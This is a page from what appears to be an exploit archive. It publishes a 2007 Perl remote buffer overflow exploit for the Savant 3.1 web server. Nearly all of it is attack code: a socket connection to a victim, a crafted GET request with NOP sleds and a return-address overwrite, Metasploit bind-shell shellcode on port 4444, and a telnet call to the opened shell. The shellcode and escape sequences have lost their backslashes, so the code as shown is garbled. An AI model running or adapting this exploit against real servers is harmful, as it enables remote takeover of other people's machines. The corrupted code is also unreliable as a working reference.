Savant 3.1 Get Request Remote Overflow Exploit (Universal)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Savant 3.1 Get Request Remote Overflow Exploit (Universal)
# Published : 2007-08-12
# Author : Jacopo Cervini
# Previous Title : Racer v0.5.3 beta 5 Remote Buffer Overflow Exploit
# Next Title : Microsoft DXMedia SDK 6 (SourceUrl) ActiveX Remote Code Execution

#!/usr/bin/perl -w
# exploit for Savant webserver 3.1 remote bof
# shellcode bind 4444 port on target host
# 
#
# Jacopo cervini aka acaro@jervus.it
#
use IO::Socket;

if(!($ARGV[1]))
{
 print "Uso: savant-3.1.pl <victim> <port>nn";
 exit;
}





$victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                        or die "can't connect on $ARGV[0] sulla porta $ARGV[1]";

#Metasploit shellcode

$shellcode = 
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb5".
"x55x45xd4x83xebxfcxe2xf4x49x3fxaex99x5dxacxbax2b".
"x4ax35xcexb8x91x71xcex91x89xdex39xd1xcdx54xaax5f".
"xfax4dxcex8bx95x54xaex9dx3ex61xcexd5x5bx64x85x4d".
"x19xd1x85xa0xb2x94x8fxd9xb4x97xaex20x8ex01x61xfc".
"xc0xb0xcex8bx91x54xaexb2x3ex59x0ex5fxeax49x44x3f".
"xb6x79xcex5dxd9x71x59xb5x76x64x9exb0x3ex16x75x5f".
"xf5x59xcexa4xa9xf8xcex94xbdx0bx2dx5axfbx5bxa9x84".
"x4ax83x23x87xd3x3dx76xe6xddx22x36xe6xeax01xbax04".
"xddx9exa8x28x8ex05xbax02xeaxdcxa0xb2x34xb8x4dxd6".
"xe0x3fx47x2bx65x3dx9cxddx40xf8x12x2bx63x06x16x87".
"xe6x06x06x87xf6x06xbax04xd3x3dx54x88xd3x06xccx35".
"x20x3dxe1xcexc5x92x12x2bx63x3fx55x85xe0xaax95xbc".
"x11xf8x6bx3dxe2xaax93x87xe0xaax95xbcx50x1cxc3x9d".
"xe2xaax93x84xe1x01x10x2bx65xc6x2dx33xccx93x3cx83".
"x4ax83x10x2bx65x33x2fxb0xd3x3dx26xb9x3cxb0x2fx84".
"xecx7cx89x5dx52x3fx01x5dx57x64x85x27x1fxabx07xf9".
"x4bx17x69x47x38x2fx7dx7fx1exfex2dxa6x4bxe6x53x2b".
"xc0x11xbax02xeex02x17x85xe4x04x2fxd5xe4x04x10x85".
"x4ax85x2dx79x6cx50x8bx87x4ax83x2fx2bx4ax62xbax04".
"x3ex02xb9x57x71x31xbax02xe7xaax95xbcx45xdfx41x8b".
"xe6xaax93x2bx65x55x45xd4";





$nop="x90"x201;
$incbh="xfexc7"x4;			# inc bh opcode
$incebx="x43"x23;			# inc ebx opcode
$asm1 = "x53xc3";			# push ebx,ret opcode
$nop1="x90"x19;
$asm = "x83xc4x8cx54xc3";		# add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are 						# some opcode not allowed and we have need of space for our shellcode 
$nop2="x90"x210;


$eip = "x74x86x41";			# 0x00418674 memory address of pop eax, ret in Savant.exe it's universal

$exploit = $asm.  " /". $nop.$incbh.$incebx .$asm1.$nop1. $eip ."rnrn" .$nop2.$shellcode;

print $victim $exploit;

print " + Malicious GET request sent ...n";


print "Done.n";


close($victim);

$host = $ARGV[0];
print " + connect to 4444 of $host ...n";
sleep(3);
system("telnet $host 4444");

exit;

# www.Syue.com [2007-08-12]